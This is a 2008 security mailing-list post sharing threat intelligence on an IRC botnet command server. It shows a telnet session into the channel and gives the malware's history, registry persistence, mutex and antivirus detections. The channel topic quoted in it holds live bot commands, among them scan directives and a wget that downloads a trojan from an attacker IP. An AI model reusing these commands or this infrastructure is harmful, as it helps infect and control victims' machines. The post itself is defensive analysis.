[nsp-sec] history on irc.intelligence-tech.com
Stephen Gill
gillsr at cymru.com
Mon Feb 25 16:25:19 EST 2008
# telnet irc.intelligence-tech.com 21958
Trying 8.14.145.68...
Connected to irc.intelligence-tech.com.
Escape character is '^]'.
NICK b
USER b b b :b
:IntTech 001 a :MySQL <...>
:IntTech 376 a :
:a MODE a :+i
JOIN #hobo nutsack
:<...> JOIN :#hobo
:IntTech 332 a #hobo :.asc -S -s|.else status scan .asc asn 50 5 0 _b _r
_h|.if nick *USA* .wkse 50 5 0 _b _r _h|.else nick *USA* .wkso 50 5 0 _b _r
_h|.r.wget http://8.14.145.115/~inttech/mstskmgr.exe c:\mstskmgr.exe h
:IntTech 333 a #hobo 10:30 PM 1200102639
:IntTech 366 a #hobo :End of /NAMES list.
Brief history on that file:
2008-01-08 12:50:01 mstskmgr.exe.aug3.0017
2007-01-04 00:51:05 http://www.naturalgardening.net/mstskmgr.exe
2007-02-01 11:01:13 129517.mstskmgr.exe
2007-02-10 07:42:52 730a87979a5aa825c5b5f547e1e7d014.exe
2007-02-14 13:46:04 mstskmgr.exe
2007-02-26 13:31:08 mstskmgr.exe
2007-04-02 18:01:02 none
2007-06-06 21:23:48 4f1582d388f19cfab7042f97e94170bcfcd4913c
2007-07-12 21:31:15 mstskmgr.exe
2007-07-15 02:16:08 730a87979a5aa825c5b5f547e1e7d014.EX$
2007-07-24 04:11:52 730a87979a5aa825c5b5f547e1e7d014.EX$
2007-07-29 04:36:17 http://www.intelligence-tech.com/mstskmgr.exe
2007-08-22 11:41:32 http://www.intelligence-tech.com/mstskmgr.exe
2007-11-06 02:37:17 http://8.14.145.115/~inttech/mstskmgr.exe
2006-11-18 20:16:04 mstskmgr.exe
dnsrr count dnsrr first seen
www.intelligence-tech.com 8 2007-01-09 12:39:43
www.int-tech.info 7 2007-01-09 12:39:43
Adds:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run "MS Task
Manager 32" = C:\WINDOWS\System32\mstskmgr.exe
Mutex:
MSTSKMGR32
Since it has been around the block AV rate is pretty good:
AV engine Country Signature
Ahnlab KR Win-Trojan/Ranky.20480.F
Aladdin (esafe) IL Win32.Ranky.de
Alwil (avast) CZ Win32:Ranky-ED [Trj]
Arcabit (arcavir) PL Trojan.Proxy.Ranky.De
Authentium US W32/Proxy.gen1
Avira (antivir) DE TR/Crypt.ULPM.Gen
BitDefender RO Trojan.Proxy.Ranky.E
CA (E-Trust Vet) US Win32/Ranck!generic
CAT (quickheal) IN TrojanProxy.Ranky.de
Central Command (vexira) US Trojan.PR.Ranky.FP
ClamAV no_virus
CPsecure US no_virus
Cybersoft (vfind) US no_virus
Dr. Web RU Trojan.Proxy.1707
Eset (nod32) US Win32/TrojanProxy.Ranky
Fortinet US W32/Ranky.DE!tr
Frisk (f-prot) IS W32/Proxy.gen1
F-Secure FI Trojan-Proxy.Win32.Ranky.de
Grisoft (avg) CZ Proxy.IAX
Hauri (virobot) KR no_virus
Ikarus AT Trojan-Proxy.Win32.Ranky.DE
Kaspersky RU Trojan-Proxy.Win32.Ranky.de
Mcafee US Proxy-FBSR.gen
MicroWorld (escan) IN Trojan-Proxy.Win32.Ranky.de
Norman NO W32/Rank.AHV
Panda ES Trj/Ranky.QL
Rising CN Trojan.Proxy.Ranky.ayw
Securecomputing (webwasher) US Trojan.Crypt.ULPM.Gen
Sophos GB Troj/Ranky-AU
Symantec US Backdoor.Ranky
TheHacker PE Trojan/Proxy.Ranky.de
Trend Micro JP TROJ_RANKY.NF
VirusBlokAda (vba32) BY Trojan-Proxy.Win32.Ranky.de
VirusBuster HU Trojan.PR.Ranky.FP
Proxy checks in to:
http://www.int-tech.info/main.php?p=21164 -> the port it chose to listen to
Cheers,
Steve, Team Cymru.
On 2/25/08 1:41 PM, "Jason Chambers" <jchambers at ucla.edu> wrote:
> ----------- nsp-security Confidential --------
>
> Hello all,
>
> I've noticed in our recent infections that 8.14.145.68 is involved with
> a few. Looking back at some past data, I see this botnet as far back as
> 2007-03-04.
>
> Anyone have any more information on this one ?
>
> 3356 | LEVEL3 Level 3 Communications | 8.14.145.68 | tcp | 25394
> | 2008-02-03 10:22:45 | 2008-02-11 10:22:45 | bot | 0 | 0 | ID: Int
> Tech DNSRR: irc.intelligence-tech.com PORTS: 21958
>
> 3356 | LEVEL3 Level 3 Communications | 8.14.145.68 | tcp | 25394
> | 2007-03-04 09:49:52 | 2007-03-12 09:49:52 | bot | 0 | 0 | ID: Int
> Tech DNSRR: irc.intelligence-tech.com PORTS: 21958_6667
>
>
> Thanks,
--
Stephen Gill, Chief Scientist, Team Cymru
http://www.cymru.com | +1 312 924 4023 | gillsr at cymru.com
More information about the nsp-security
mailing list